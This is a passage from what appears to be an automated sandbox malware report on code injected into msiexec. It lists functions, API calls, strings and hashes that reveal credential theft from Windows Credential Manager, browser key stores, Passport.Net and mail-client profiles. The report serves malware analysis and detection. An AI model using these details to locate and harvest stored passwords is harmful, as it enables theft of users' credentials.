                                                                                        • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                        • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                        Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                        Strings
                                                                                        • abort due to ROLLBACK, xrefs: 00428781
                                                                                        • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                        • unknown error, xrefs: 004277B2
                                                                                        • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                        • no such savepoint: %s, xrefs: 00426A02
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                        • API String ID: 3510742995-3035234601
                                                                                        • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                        • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                        • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                        • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                        Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                        • API String ID: 2221118986-3608744896
                                                                                        • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                        • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                        • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                        • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                        Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                          • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpmemcpy
                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                        • API String ID: 1784268899-4153596280
                                                                                        • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                        • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                        • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                        • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                        Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                        • memset.MSVCRT ref: 00410246
                                                                                        • memset.MSVCRT ref: 00410258
                                                                                          • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                        • memset.MSVCRT ref: 0041033F
                                                                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                        • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3974772901-0
                                                                                        • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                        • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                        • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                        • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                        Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcslen.MSVCRT ref: 0044406C
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                        • strlen.MSVCRT ref: 004440D1
                                                                                          • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                          • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                        • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 577244452-0
                                                                                        • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                        • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                        • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                        • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                        Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                        • _strcmpi.MSVCRT ref: 00404518
                                                                                        • _strcmpi.MSVCRT ref: 00404536
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcmpi$memcpystrlen
                                                                                        • String ID: imap$pop3$smtp
                                                                                        • API String ID: 2025310588-821077329
                                                                                        • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                        • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                        • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                        • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                        Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C02D
                                                                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                          • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                          • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                          • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                        • API String ID: 2726666094-3614832568
                                                                                        • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                        • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                        • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                        • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                        Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403A88
                                                                                        • memset.MSVCRT ref: 00403AA1
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                        • strlen.MSVCRT ref: 00403AE9
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1786725549-0
                                                                                        • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                        • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                        • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                        • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                        Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                          • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                          • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                        • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                        • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                        • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID: global-salt$password-check
                                                                                        • API String ID: 231171946-3927197501
                                                                                        • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                        • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                        • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                        • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                        Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                        • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                        • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                        • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                        Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                        • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                        • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                        • EndPaint.USER32(?,?), ref: 004016F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                        • String ID:
                                                                                        • API String ID: 19018683-0
                                                                                        • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                        • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                        • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                        • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                        Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040644F
                                                                                        • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                        • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                          • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID:
                                                                                        • API String ID: 438689982-0
                                                                                        • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                        • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                        • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                        • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                        Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044495F
                                                                                        • memset.MSVCRT ref: 00444978
                                                                                        • memset.MSVCRT ref: 0044498C
                                                                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                        • strlen.MSVCRT ref: 004449A8
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                        • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                        • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset$strlen
                                                                                        • String ID:
                                                                                        • API String ID: 2142929671-0
                                                                                        • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                        • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                        • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                        • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                        Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                        • strlen.MSVCRT ref: 0040F7BE
                                                                                        • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                        • String ID: Passport.Net\*
                                                                                        • API String ID: 2329438634-3671122194
                                                                                        • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                        • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                        • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                        • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                        Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                        • memset.MSVCRT ref: 0040330B
                                                                                        • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                        • strchr.MSVCRT ref: 0040335A
                                                                                          • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                        • strlen.MSVCRT ref: 0040339C
                                                                                          • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                        • String ID: Personalities
                                                                                        • API String ID: 2103853322-4287407858
                                                                                        • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                        • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                        • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                        • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                        Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                        • API String ID: 3510742995-272990098
                                                                                        • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                        • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
